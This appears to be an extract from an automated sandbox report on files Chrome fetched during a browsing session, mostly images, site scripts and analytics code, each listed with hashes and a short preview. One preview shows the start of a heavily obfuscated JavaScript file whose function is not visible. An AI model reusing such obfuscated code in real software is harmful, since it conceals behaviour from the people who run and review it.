            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="peru">.. <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.72694L0 13.3807C0 14.3344 0.771174 15.1076 1.72253 15.1076L7.66668 15.1076L7.66668 0L1.72253 0Z" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L7.66682 0L7.66682 15.1077L0 15.1077L0 0Z" transform="translate(7.666992 0.00018310547)" id="Rectangle" fill="#F5F5F5" stroke="none" />.. <path d="M5.94415 0L0 0L0 15.1076L5.94415 15.1076C6.89546 15.1076 7.66668 14.3344 7.66668 13.3806L7.66668 1.72694C7.66668 0.77315 6.89551 0 5.94415 0Z" transform="translate(15.333496 0)" id="Path" fill="#FF4B55" stroke="none" />.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):16124
            Entropy (8bit):4.299491965316094
            Encrypted:false
            SSDEEP:384:4kjTlnk60eJkF/KiCJGswj/s/XciIUb57PIK:XTC60ckFqJU4jxt
            MD5:C6F3D81373AA05B1939104A6C20016EB
            SHA1:B8220119A9DF75DF0E6628AFCF00157BA590EB3B
            SHA-256:43B6F9F5934723F32D733FA0AE4B7F6D53126B11D67C37FA7738DBF824E67B43
            SHA-512:2B9FDB952CCF7EB66EE63A911024EF06336834CD392278AC59B1A871650F04A0AE612FB5A7ACCB4A38ADCAAFB70B56D8999BC55DBD37A6D6EF4D0C69A906DD6A
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/award-decoration.svg
            Preview:<svg width="57" height="50" viewBox="0 0 57 50" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2848_5211)" filter="url(#filter0_d_2848_5211)">.<path d="M24.6997 19.4844L23.8423 24.6599L28.3306 22.2164H28.6661L33.1543 24.6599L32.2969 19.4844L32.4007 19.1543L36.0318 15.4884L31.0137 14.7334L30.7424 14.5295L28.4984 9.82056L26.2542 14.5295L25.983 14.7334L20.9648 15.4884L24.5961 19.1543L24.6997 19.4844Z" fill="#FFEC3F"/>.<path d="M10.0317 10.216C9.5709 11.2561 9.18919 12.3317 8.89001 13.4333C9.07048 14.0751 9.08209 14.7553 8.92363 15.4033C8.89294 15.5637 8.84196 15.7191 8.772 15.8657C8.76179 15.8879 8.7475 15.9078 8.72992 15.9244C8.71302 15.9424 8.6928 15.9566 8.67046 15.9663C8.56494 16.0166 8.454 16.0535 8.33999 16.0764C8.18358 17.1397 8.10453 18.2137 8.10352 19.2892C8.10352 19.4351 8.10649 19.5808 8.10946 19.7267C8.57833 20.4021 8.82497 21.2159 8.81294 22.0477C8.82041 22.2207 8.80565 22.3939 8.76903 22.5628C8.76454 22.5834 8.75681 22.6031 8.74616 22.6211C8.73191 2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text
            Category:downloaded
            Size (bytes):15802
            Entropy (8bit):5.27769575476003
            Encrypted:false
            SSDEEP:384:RRi/1mlmJmioi5liTidmi8lieCrxRBKMR5YU:3kBFi2tneCrxRBr
            MD5:617F82307EE3CC183F4EC9FE00563A4E
            SHA1:F39E9E86BC405AFFD360466439CCD0F10A4A707B
            SHA-256:8F1A99A900496EBB2E9FB4CA0DAFD773111F10AC0CFD50090F42505AB6473548
            SHA-512:2A3289C59DF77677E4B74949648A83E0866193C6397E0EBF300A3CA029FAECF2B861335E240A64FF959049AAD994A45D9865703E7998B74DD057D23E6031CA96
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main.js
            Preview:jQuery(document).ready(function($) {..//-------------------------- STICKY MENU....var stickyOffset = $('.main-menu').offset().top;.$(window).scroll(function(){. var sticky = $('.main-menu'),. scroll = $(window).scrollTop();.. if (scroll >= stickyOffset) sticky.addClass('fixed');. else sticky.removeClass('fixed');.});..//-------------------------- FUNCIONES RESPONSIVE.... var alterClass = function() {. var ww = document.body.clientWidth;. if (ww < 950) {. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");. $('.submenu-collapse').removeClass('show');. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');... } else if (ww >= 951) {. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");. $('.submenu-collapse').addClass('show');. $('.first-lvl').removeClass('collapsed'
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5945)
            Category:downloaded
            Size (bytes):352256
            Entropy (8bit):5.600795746544581
            Encrypted:false
            SSDEEP:6144:g4JCpmFURClq04d7npJsEsOemveUN7X0fxnzQ:JJLWRCQnhpJs7c
            MD5:A5D1B8C8E0F62928CEFB29A757C4D0A1
            SHA1:3FE2BEB36F131F2E15C7616E26DCAFCD8E550CEF
            SHA-256:EC0F8114CF0999ADC20C98FE6682065CA962E872422E8D4CB6CC25F2DCB75476
            SHA-512:BEAC0B0469BB9D066D737F1DF10F628D1D04A08584E42B6021BA7E37F62110C5FC08495106D4E0776884737CE3186D2E03536925FA9C8E5C58EE730E3334164A
            Malicious:false
            Reputation:low
            URL:https://www.googletagmanager.com/gtag/js?id=G-94GBDVKM3R
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ads_datatos","priority":24,"vtp_instanceDestinationId":"AW-10981864615","tag_id":16},{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_f
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2232
            Entropy (8bit):4.963491601667423
            Encrypted:false
            SSDEEP:24:2dZnmPL0/veaxMnYdoVjt4Mt4Psdn3b8iY7NogA4g2PFygx0FlwfPx42PFydM/t9:cZmjFYl2dUJN/x0FufPF6Mlkz4ZB3
            MD5:264987FA326BA5ECD1CB4E6449D099EF
            SHA1:086968AA4BF1A6ABE53A68944480DA74AEAE4E85
            SHA-256:F44306656CF70EBC5B7A66D84673C471E5786ACAA304A47FFFEAC3AACA7834BA
            SHA-512:888EE1D7864C8719B3E95E7A026BE1848264EC7197277077C692B36F5BAF6EE0500B3004AE8F38D17F58B590920B7277F8F252929333190AFCF1A7A4248A58F3
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-05.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 75</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-1029.000000, -984.000000)" id="Group-75">.. <g transform="translate(1029.000000, 984.000000)">.. <g id="Group-52" fill="#670DFF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <path d="M20.5853271,21.4768205 C19.9958731,20.8410598 19.0399853,20.8410598 18.4504307,21.4768205 L12.442166,27.9559799 C11.8526113,28.5917406 11.8526113,29.622437 12.442166,30.2581977 L18.4504307,36.737357 C19.0398847,37.3731178 19.9957724,37.3732263 20.5853271,36.737357 C21.1748818,36.1015963 21.1748818,35.0708999 20.5853271,34.4351392 L15.644561,29.107143 L20.5854277,23.77903
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
            Category:downloaded
            Size (bytes):4147
            Entropy (8bit):4.802206661419701
            Encrypted:false
            SSDEEP:48:z2D5zCCzcVHTr8Lzwr91YLyGcdQBRnHmz8r+wkZKyL/KpWpKvkj8/BBmL/s7Dypf:i10rMLEX89G7z4sMB9DZ09
            MD5:F3D6C4F05067DCDE79C9E8481718AE38
            SHA1:49BCE7248F7B012B908394CA1760A34EA5EC79FD
            SHA-256:CDEC0B535ADAB61B0D76E31C906018306E63543E97136239DFE9AAF340B651E9
            SHA-512:0C38084AC35EFB56AACD24DD88C22E6741F1778358AEF776FDEFFEBA5B79CB7DC24301DFAE197ABB2DC8AF2DCB8E19A7A4C39FB6F256C2FB431293A7C164612A
            Malicious:false
            Reputation:low
            URL:https://mobile.servientrega.com/WebSitePortal/RastreoEnvio.html
            Preview:.<html>..<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">.. <meta http-equiv="content-language" content="es">.. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">.. <title>Rastreo Envio - Servientrega Web</title>.. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>... <script src="js/jquery.min.js"></script>-->.. <script src="https://www.google.com/recaptcha/api.js"></script>-->.. <script type="text/javascript" src="js/rastreo.js"></script>.. <link href="assets/css/plug.min.css" rel="stylesheet" />.. <link href="assets/css/app.css" rel="stylesheet" />.. <link href="assets/css/appb.css" rel="stylesheet" />.................. <script>.. (function (i, s, o, g, r, a, m) {.. i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {.. (i[r].q = i[r].q || []).push(arguments).. }, i[r
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (844)
            Category:downloaded
            Size (bytes):845
            Entropy (8bit):4.966260081974412
            Encrypted:false
            SSDEEP:24:QN5750hj5NAYunj6/1/Ia162eeeBbABbABbIQTKPaC:QNZm57ajW/NjeeeRARARIQePaC
            MD5:1836E1E9AB08F01D48DFDEA5EF452921
            SHA1:5BB2D0CD0D1997017ABC6B9D1F4A65E057C2FFAD
            SHA-256:BEB216900D6CBA42817A276382E0C080BBC405D67455E6B5356EECCC3DE02B6E
            SHA-512:9479851EF67787CA07849CFCE04C2CC5AF9A50795B0F4CFA723AD8C3BE61FE43BEB1F5DF70B9D4BDA0F634C7CED59568EFA0ADDC7AA7CCE157FC2B1218DE5704
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/beb21690tE5dP.css
            Preview:form div.input[data-v-b1864b9d]{margin-bottom:1.2em;position:relative}form div.input label[data-v-b1864b9d]{display:block;pointer-events:none;text-transform:capitalize}form div.input input[data-v-b1864b9d]{padding:5px;font-size:1em;box-sizing:border-box;width:100%}form[novalidate] .error[data-v-b1864b9d]{display:none}.js-has-pseudo [csstools-has-2u-33-36-31-2j-32-33-3a-2p-30-2x-2s-2p-38-2t-2l-1a-2x-32-3a-2p-30-2x-2s-w-2s-2x-3a-1a-2x-32-34-39-38-1m-2w-2p-37-14-2x-32-34-39-38-1m-2x-32-3a-2p-30-2x-2s-15-w-1a-2t-36-36-33-36][data-v-b1864b9d]:not(.does-not-exist):not(.does-not-exist):not(.does-not-exist):not(.does-not-exist):not(does-not-exist):not(does-not-exist):not(does-not-exist){display:block;color:red;font-size:.9em}form[novalidate].invalid div.input:has(input:invalid) .error[data-v-b1864b9d]{display:block;color:red;font-size:.9em}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1076
            Entropy (8bit):5.351029693921622
            Encrypted:false
            SSDEEP:24:2dXAALfEVj81b/qQzkkVTFHz15m/PikbKSG+orbQeOxyfWy5:cXAQfEVj8R/qkVTFT15mXiS/PkExyfD5
            MD5:9AE2D6FA08EE9EA87CBADA120D4156F1
            SHA1:0E839370AFC3327CAEA7294569B656F186665297
            SHA-256:19295C0ACFD7FBE9F3F862161B1D2A73B269799F82BDD8512F140CDF7426659B
            SHA-512:651888BECB5003B943724F6CB98548CB3BFE889A523C4C3AD5F44A51D7EB637BF95D01E493DA28EA1051CAC6ACD5FDF67966266A83CEAF81BAC7CD9D738F730A
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/header_ins.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.2.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 23 23" style="enable-background:new 0 0 23 23;" xml:space="preserve">..<style type="text/css">....st0{fill:#FFFFFF;}..</style>..<desc>Created with Lunacy</desc>..<g>...<g>....<path class="st0" d="M16.5,23H6.5C2.9,23,0,20.1,0,16.5V6.5C0,2.9,2.9,0,6.5,0h9.9C20.1,0,23,2.9,23,6.5v9.9.....C23,20.1,20.1,23,16.5,23z M6.5,2C4,2,2,4,2,6.5v9.9C2,19,4,21,6.5,21h9.9C19,21,21,19,21,16.5V6.5C21,4,19,2,16.5,2H6.5z"/>...</g>...<g>....<path class="st0" d="M11.5,17.4c-3.2,0-5.9-2.6-5.9-5.9c0-3.2,2.6-5.9,5.9-5.9s5.9,2.6,5.9,5.9C17.4,14.7,14.7,17.4,11.5,17.4z..... M11.5,7.6c-2.2,0-3.9,1.8-3.9,3.9s1.8,3.9,3.9,3.9s3.9-1.8,3.9-3.9S13.7,7.6,11.5,7.6z"/>...</g>...<g>....<path class="st0" d="M19.1,5.3c0,0.8-0.6,1.4-1.4,1.4c-0.8,0-1.4-0.6-1
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):25821
            Entropy (8bit):4.40402848184812
            Encrypted:false
            SSDEEP:192:Lrh963ROda6jjEi/rGewdt7yM6eJe/ahXi/OGen3Qrdn/vRni/YGeRkt7aK6e5ep:nh9mOM6nseMhb3e9RVVU73TAd
            MD5:0462C275036497B098EBF1024AFDA963
            SHA1:CBF50789EBB5468D18E3A00C8026088E8DF1FEA2
            SHA-256:8F1F0A6BB665FA3AB90141CCCD52C27299D353DAA4CD6F2AD9358C145D314D91
            SHA-512:F85547BFA5CB197BDCDD46E441F74C4277BE8E6B0A9AD5E715E810DB2D5F8F1821F632D0FE44FB99DC8A85400F20F3F17BBBC3A58565D0C872584AA8105CA273
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="united-states">.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.76764 0 1.71464L0 13.2853C0 14.2323 0.771174 15 1.72253 15L21.2775 15C22.2288 15 23 14.2323 23 13.2853L23 1.71464C23 0.76764 22.2288 0 21.2775 0Z" transform="translate(0 4.4716053E-05)" id="Path" fill="#F5F5F5" stroke="none" />.. <g id="Group" transform="translate(0 4.4716053E-05)">.. <path d="M0 1.15385L22.8105 1.15385C22.5771 0.482352 21.9367 0 21.1827 0L1.62779 0C0.87382 0 0.233459 0.482352 0 1.15385Z" transform="translate(0.094740234 0)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 4.6153226)" id="Rectangle" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 2.3075273)" id="Rectangle" fill=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (21060)
            Category:dropped
            Size (bytes):21233
            Entropy (8bit):5.216885202565074
            Encrypted:false
            SSDEEP:384:wnM6G590O7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBS5vISg3gzopL9TidOgHX:55l7X/jD45eSxpOxvKD73S5vTzwL9Tib
            MD5:1022EAF388CC780BCFEB6456157ADB7D
            SHA1:313789CA0E31B654784DBBA8B0F83F364F8683B4
            SHA-256:FE28DC38BC057F6EB11180235BBE458B3295A39B674D889075D3D9A0B5071D9F
            SHA-512:B9BB93F19F3C5B17B3812A9FDD12EE362E659A3B2D8897327B3C77E32214DA0007A27222DBB35AEDAB6ACD46423A8638084C5AA05BA6CCEB054360A1F88FC70B
            Malicious:false
            Reputation:low
            Preview:/*. Copyright (C) Federico Zivolo 2020. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):14308
            Entropy (8bit):4.27255113143574
            Encrypted:false
            SSDEEP:384:v9qPPPM+c+7ggBesrezsq4MbBAUGi+ggA:v9ok+J0QrzqBGFA
            MD5:38FFB1C52979DECA1D28D49D2A8CB4AC
            SHA1:ECF007736CC5BB152434049020ED5863A747D84D
            SHA-256:227565DEF1FB1F4B9363275E84804BBBD85CADF3B54B3E90883C6E456728D90A
            SHA-512:C101AD2542579AB2C09AF60F6CA1F768CC2596C99F77D9893BCE28F080347D5D5094D30B24045C10304FF4D05FF47A41F5F0ED2032168E77E0B70D17E3D915EA
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="219px" height="37px" viewBox="0 0 219 37" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (59873), with no line terminators
            Category:dropped
            Size (bytes):115770
            Entropy (8bit):5.542103538297206
            Encrypted:false
            SSDEEP:3072:xQDlseA9UmVbTdBdrcUvKtwk5Zdyx9C+dIiNj/OL1GdAMgs:xQDVA9UYPoUvcwIZdy7CwIit/OL1Gzgs
            MD5:3056CE77AFF2B16B3FBAE68878931617
            SHA1:A7510A42D6D703834819412347CBAF66F95C8822
            SHA-256:BD60085792C981360EA73E88D5DBA367137421177B3BC9AC02BF3947442BA378
            SHA-512:7CDFEE3AA6B5B8C5DEEF55EAB749AC8C0D15C01A241E435BF3A48CCAB2A8BE46F4E6A973F6CB4CA8D27B66AD892EE7DB4DE2025F5C2FAAED0A32D3FB74FA72B3
            Malicious:false
            Reputation:low
            Preview:var a18_0x285282=a18_0x9666;(function(_0x1b38c6,_0x5e1e48){var _0x3986b0=a18_0x9666,_0x548164=_0x1b38c6();while(!![]){try{var _0x1d9a6b=-parseInt(_0x3986b0(0x61e))/0x1+parseInt(_0x3986b0(0x2f1))/0x2+parseInt(_0x3986b0(0x5f7))/0x3*(parseInt(_0x3986b0(0x3cc))/0x4)+parseInt(_0x3986b0(0x525))/0x5*(parseInt(_0x3986b0(0x2ff))/0x6)+-parseInt(_0x3986b0(0x247))/0x7*(-parseInt(_0x3986b0(0x5ee))/0x8)+-parseInt(_0x3986b0(0x434))/0x9+-parseInt(_0x3986b0(0x5fd))/0xa;if(_0x1d9a6b===_0x5e1e48)break;else _0x548164['push'](_0x548164['shift']());}catch(_0x1153e5){_0x548164['push'](_0x548164['shift']());}}}(a18_0x4b5c,0xaf7b1));var a18_0x4fcab0=(function(){var _0x4c567f=!![];return function(_0x206ecd,_0x3a4a2e){var _0x228a30=_0x4c567f?function(){if(_0x3a4a2e){var _0x57da66=_0x3a4a2e['apply'](_0x206ecd,arguments);return _0x3a4a2e=null,_0x57da66;}}:function(){};return _0x4c567f=![],_0x228a30;};}()),a18_0x13398b=a18_0x4fcab0(this,function(){var _0x262b96=a18_0x9666;return a18_0x13398b[_0x262b96(0x394)]()[_0x
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 600 x 596, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):422602
            Entropy (8bit):7.995559701208269
            Encrypted:true
            SSDEEP:6144:W1mzJlUNayBaVGGnMjYCBfVA8SePeXo2HpCcmidBPQnw8K4NuDQ3tXo5hC2y:WcSaoaLM7BNNXWXo2HpOiEnvlNu89X9j
            MD5:D93A9C44020F2FAF94F3A5AAB064B907
            SHA1:E16C51710FC6B8052309DE3A284D59D0F289DE9A
            SHA-256:DDF17DBD362831A1096C4FF9924E9EB61CB03D6E51AA616624EC0A735B33C365
            SHA-512:71FC2831979B6A3B4987F291C51D6B4E8A3157E634193F84D8896247854448C9DD41F8061FB8F0FB743AE46EA62064FE53C0E8522584AD67113560319295559F
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/imagen-home-2024.png
            Preview:.PNG........IHDR...X...T......X.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.9 (Windows)" xmpMM:InstanceID="xmp.iid:A8BAE5674EB111EFB77DB2F0042F9FE4" xmpMM:DocumentID="xmp.did:A8BAE5684EB111EFB77DB2F0042F9FE4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8BAE5654EB111EFB77DB2F0042F9FE4" stRef:documentID="xmp.did:A8BAE5664EB111EFB77DB2F0042F9FE4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.f...o:IDATx.....E......M'.N..{o...@.I." ...DP, ..T). .."".....^.$!..n.....3.}.{w)_...p.n....rf.9.<.......u.i.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (14929)
            Category:dropped
            Size (bytes):330270
            Entropy (8bit):5.5999766843178
            Encrypted:false
            SSDEEP:6144:44dGpmFU7ili04d7z3KsOemveQN7X0fxnP5:hdPW7i4nhDDx
            MD5:41FEC75F18CD5E43959A0D6A0F638C75
            SHA1:79F8E0C9BE32A2FCA233749D46C5B6B3619C635F
            SHA-256:E99E96ED67B3A784447C0A9A1975D0CB3B94D5ECB358011D06B8F75812E75144
            SHA-512:05E7332B3B2F83F1E2503866593B2AA4E07DCEBBB862A82B6413C87CCFB2FA0F550A23FC715763D6145ABFA6885EBE899CA1C67E87B7A0E24C521744DEBAC0D0
            Malicious:false
            Reputation:low
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":26,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 220 x 53, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):3628
            Entropy (8bit):7.926492743877884
            Encrypted:false
            SSDEEP:96:YoQJELCEBBBMnJyqomTBhq3RpqbUd9uV+W5rU/XJ6IdP:YvJEL+9oyDqeE0trU/J6IdP
            MD5:A05E6932B02F45B5BCE0F54A08FA3EE0
            SHA1:F12F08A8281EAA3A4227FF81BA38F525A212E387
            SHA-256:9AB3CBCC0979269618E4B7454D50AB8B3C9AFA6453423E08003FDFC10B0CCF25
            SHA-512:25C7D8112A6A50591C17178276A096CE30DAB2F72287112B0053B1F0C2813873A492050C70B2E861C2626E98335A0A16604132FB59CC36B12714661775BD7CF9
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/verificado-clutch.png
            Preview:.PNG........IHDR.......5.....*.......pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...o.....G..S....=e|.]9E.4.6.[o.o.E............ ._.-v..P`.E{..7.)...p.C...6..H3.8Qm~.B....E..G>rFD.....x<..X.859.T.r:.t.......)V.".BN.F....N..Z...@...d.......|}.Y.....D].o....................G...2.CNR}.:w.iW..Q...@.8T..@N.(.e.Z.|d..P..U.G..7.~q.GJ...e^[eBK..:.)..*.F}"...^...Ty&...^..W4)U..+J.A.T.\...X.xP..q.ep-.......3.}.J&.:g..r7.<md&...h...J..i.:.a..Q.U%.sO.8.S....{.i.*.R.$H..Y.......}v...8u(5..4..61.....y.o..=.z.auD......Q...Vsd<.j..........]..8.....Z...z8........$e...6.a...Q...2.u....4..RO..g.!O.+..[|7.&..so.R.[........U.C.1...)U.F.{.F..J...g....Z*.G._s..8.)k\0......R...m.s...~....W...J....rh....N....J=A..2.....P......u%..p......8T.{4.CU....7...0.......x.0...P4(g.Q.I.......9..nzxzh$MD..D...C4....'\.A#A}w.y..0D|K..LQz..Mu_.=.6d|E.....D.N ..%.j1.....x<.....x<.....x<.....x<.....x<..E.g...St:....Q|..!.;......j..)....C.{.T.0.i.oH4... ..s....^.3...[M..W
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):3940
            Entropy (8bit):5.302170855816384
            Encrypted:false
            SSDEEP:96:hO1ay9Vc+ulO1ayvZNhOEay9Vc+ulOEayvZNhOXay9Vc+ulOXayvZNhOxMay9Vcm:HypOy6ypnypypAywyp5yXypKyb
            MD5:78CD3B0F8F59CF1F183E11B7C9DAB590
            SHA1:59D53193FB1D8DFBFB37E95D8FC02B801840B8E5
            SHA-256:9B9FD39AF029E10E96532B73F299B7EC7F841C674BC1A4E597C6A78BD246BB55
            SHA-512:3E62DC8F02DA6471D2E692444487A966C134AB4D294A1BB73A7D75FD3BD9D738448BA1782261E4780D5C99CD71BE44D3D9FE266D22319AB7B55B426356993926
            Malicious:false
            Reputation:low
            URL:https://fonts.googleapis.com/css2?family=Urbanist:wght@300;400;500;600;700&display=swap
